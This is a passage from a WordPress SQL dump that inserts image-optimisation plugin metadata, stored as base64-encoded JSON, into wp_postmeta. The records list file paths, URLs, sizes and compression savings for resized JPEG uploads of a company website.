2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjcyOTcsInRpbWUiOjE0ODM1ODYzNDYsImlkIjo0MjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NDYsInRpbWUiOjE0ODM1ODYzNTEsImlkIjo0MjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTUsInRpbWUiOjE0ODM1ODYzNTQsImlkIjo0MjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NDUsInRpbWUiOjE0ODM1ODYzNTgsImlkIjo0MjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNzI4LCJ0aW1lIjoxNDgzNTg2MzYxLCJpZCI6NDI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MzcsInRpbWUiOjE0ODM1ODYzNjUsImlkIjo0MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzODktMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU2NCwidGltZSI6MTQ4MzU4NjM2OCwiaWQiOjQyNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODA5LCJ0aW1lIjoxNDgzNTg2MzcyLCJpZCI6NDI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzODktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4NjUsInRpbWUiOjE0ODM1ODYzNzYsImlkIjo0MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzODktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjExOTAsInRpbWUiOjE0ODM1ODYzNzksImlkIjo0MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5czg5LTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXM4OS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzODktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5NDYsInRpbWUiOjE0ODM1ODYzODMsImlkIjo0MjZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30187, 424, 'wpfc_optimisation_reduction', '16072'); 
INSERT INTO `wp_postmeta` VALUES (30188, 424, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC5qcGciLCJ3aWR0aCI6MzY1OCwiaGVpZ2h0IjoyNDM0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTg2Mzg4LCJpZCI6IjQyNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2NjAsInRpbWUiOjE0ODM1ODYzOTEsImlkIjo0MjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtODAweDUzMi5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC04MDB4NTMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTgwMHg1MzIuanBnIiwicmVkdWN0aW9uIjoxMzAxLCJ0aW1lIjoxNDgzNTg2Mzk1LCJpZCI6NDI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC03Njh4NTExLmpwZyIsInJlZHVjdGlvbiI6MTIwNiwidGltZSI6MTQ4MzU4NjM5OSwiaWQiOjQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0xNjAweDEwNjUuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0xNjAweDEwNjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMTYwMHgxMDY1LmpwZyIsInJlZHVjdGlvbiI6NTczOSwidGltZSI6MTQ4MzU4NjQwMywiaWQiOjQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU3MCwidGltZSI6MTQ4MzU4NjQwNiwiaWQiOjQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxOCwidGltZSI6MTQ4MzU4NjQxMCwiaWQiOjQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUyMiwidGltZSI6MTQ4MzU4NjQxMywiaWQiOjQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNTgsInRpbWUiOjE0ODM1ODY0MTcsImlkIjo0MjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ1OCwidGltZSI6MTQ4MzU4NjQyMCwiaWQiOjQyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NTUzLCJ0aW1lIjoxNDgzNTg2NDIzLCJpZCI6NDI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2NjUsInRpbWUiOjE0ODM1ODY0MjcsImlkIjo0MjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjczMywidGltZSI6MTQ4MzU4NjQzMCwiaWQiOjQyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6ODc2LCJ0aW1lIjoxNDgzNTg2NDM0LCJpZCI6NDI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtd2luZG93LVJlbGVhU3lzODgtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS13aW5kb3ctUmVsZWFTeXM4OC02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLXdpbmRvdy1SZWxlYVN5czg4LTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMjEzLCJ0aW1lIjoxNDgzNTg2NDM4LCJpZCI6NDI0fV0='); 
INSERT INTO `wp_postmeta` VALUES (30189, 422, 'wpfc_optimisation_reduction', '1209349'); 
INSERT INTO `wp_postmeta` VALUES (30190, 422, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by1yYWRpY2FsLWludGlhdG9yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by1yYWRpY2FsLWludGlhdG9yLmpwZyIsIndpZHRoIjo1OTA1LCJoZWlnaHQiOjU5MDUsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXpvLXJhZGljYWwtaW50aWF0b3IuanBnIiwicmVkdWN0aW9uIjoxMjA5MzM1LCJ0aW1lIjoxNDgzNTg2NDQ5LCJpZCI6IjQyMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmF6by1yYWRpY2FsLWludGlhdG9yLTM0MHgzNDAuanBnIiwid2lkdGgi